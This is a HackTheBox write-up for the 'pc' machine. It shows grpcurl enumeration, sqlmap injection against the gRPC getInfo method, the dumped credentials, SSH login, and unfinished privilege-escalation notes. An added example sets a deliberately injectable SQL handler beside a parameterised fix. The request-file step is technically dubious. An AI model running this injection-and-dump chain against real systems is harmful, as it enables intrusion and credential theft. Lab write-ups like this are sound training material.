HTB: pc Writeup

Machine Information

| Attribute | Details |
|---|---|
| Name | pc |
| OS | Linux |
| Difficulty | Easy |
| Points | N/A |
| Release Date | N/A |
| IP Address | 10.129.92.20 |
| Author | D3vnomi |

Machine Rating

⭐⭐⭐☆☆ (6.0/10)

Difficulty Assessment:

  • Enumeration: ⭐⭐☆☆☆
  • Real-world: ⭐⭐⭐☆☆
  • CVE: ⭐☆☆☆☆
  • CTF-like: ⭐⭐☆☆☆

Summary

pc is an Easy-difficulty Linux machine featuring a gRPC service vulnerable to SQL injection. The exploitation path involves enumerating the gRPC endpoint to discover its services, leveraging the SQL injection to extract credentials, and gaining SSH access as the sau user.

TL;DR: gRPC Enumeration → SQL Injection → Credential Dump → SSH Access.


Reconnaissance

Port Scanning

nmap -sC -sV -T4 -p- 10.129.92.20

Results:

Port 50051 is open, running a gRPC service.

Service Enumeration

gRPC Service Discovery:

Enumerate available gRPC services using grpcurl:

./grpcurl -plaintext 10.129.92.20:50051 list

Output:

SimpleApp
grpc.reflection.v1alpha.ServerReflection

List available methods in the SimpleApp service:

./grpcurl -plaintext 10.129.92.20:50051 list SimpleApp

Output:

SimpleApp.LoginUser
SimpleApp.RegisterUser
SimpleApp.getInfo

Initial Foothold

Exploitation Path: SQL Injection

The gRPC service contains a SQL injection vulnerability in one of its methods. Using sqlmap, the vulnerability was exploited to extract data from the backend database.

Create a request file (sql.req) capturing the gRPC request:

./grpcurl -plaintext -d '{"id":"<INJECTION_POINT>"}' 10.129.92.20:50051 SimpleApp.getInfo > sql.req

Exploit using sqlmap:

sqlmap -r sql.req --dump

This reveals the backend database structure and extracts sensitive information.
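The root cause on the server side, shown as an added example that is not part of the original writeup and is not the target's actual code: a handler for the `id` field of `getInfo` that builds its query by string formatting, next to a hardened version that validates the field and binds it as a parameter. The table names, column names, sample rows, and function names are all assumptions constructed for illustration.

```python
import sqlite3

# Constructed input: an "id" value carrying SQL instead of a number.
CRAFTED_ID = "1 UNION SELECT password FROM accounts"


def make_db():
    """Build a constructed in-memory database (the real schema is not shown in the writeup)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE messages (id INTEGER PRIMARY KEY, message TEXT);
        CREATE TABLE accounts (username TEXT, password TEXT);
        INSERT INTO messages VALUES (1, 'Will update soon.');
        INSERT INTO accounts VALUES ('alice', 'constructed-secret');
    """)
    return conn


def get_info_vulnerable(conn, req_id):
    # Flawed: the client-supplied field is pasted into the SQL text,
    # so its content is parsed as SQL rather than treated as a value.
    query = f"SELECT message FROM messages WHERE id = {req_id}"
    return [row[0] for row in conn.execute(query)]


def get_info_hardened(conn, req_id):
    # 1) Validate: the field must be a plain ASCII decimal integer.
    if not (isinstance(req_id, str) and req_id.isascii() and req_id.isdigit()):
        raise ValueError("id must be a decimal integer")
    # 2) Bind: the value travels separately from the SQL text.
    rows = conn.execute(
        "SELECT message FROM messages WHERE id = ?", (int(req_id),)
    )
    return [row[0] for row in rows]


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", get_info_vulnerable(db, CRAFTED_ID))
    try:
        get_info_hardened(db, CRAFTED_ID)
    except ValueError as exc:
        print("hardened rejected input:", exc)
```

Parameter binding alone already stops the query from being rewritten; the validation step additionally rejects malformed input early so it can be logged and alerted on.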


User Compromise

Credential Discovery

The SQL injection exploitation via sqlmap dumped the application database, revealing user credentials:

| Username | Password |
|---|---|
| admin | admin |
| sau | HereIsYourPassWord1431 |

SSH Access

Connect to the target as the sau user:

ssh sau@10.129.92.20

Password: HereIsYourPassWord1431

User Flag

cat ~/user.txt

🚩 User Flag: <REDACTED>


Privilege Escalation

Enumeration

sudo -l
find / -perm -4000 -type f 2>/dev/null
ps aux | grep -E "python|java|node|php|ruby"

Exploitation (Root/Administrator)

[Notes incomplete]

Root Flag

cat /root/root.txt

🚩 Root Flag: <REDACTED>


Attack Chain Summary

graph TD
A["gRPC Enumeration<br/>(grpcurl)"] --> B["SQL Injection<br/>(SimpleApp.getInfo)"]
B --> C["Credential Dump<br/>(sqlmap)"]
C --> D["SSH Access<br/>(sau user)"]
D --> E["User Flag"]
E --> F["Privilege Escalation<br/>(incomplete)"]

Tools Used

| Tool | Purpose |
|---|---|
| grpcurl | gRPC service enumeration and introspection |
| sqlmap | SQL injection exploitation and database dumping |
| ssh | SSH client for remote access |

Key Learnings

  • Thorough enumeration is critical — every open port and service can be a potential entry point.
  • Configuration files and databases often contain credentials that enable lateral movement.
  • Privilege escalation frequently depends on misconfigurations rather than software vulnerabilities.

Author

D3vnomi


Disclaimer

This writeup is for educational purposes only. All activities described were performed in a controlled, legal environment (HackTheBox platform). Unauthorized access to computer systems is illegal.


Last Updated: 08 Mar 2026

Tags: #HackTheBox #Linux #Easy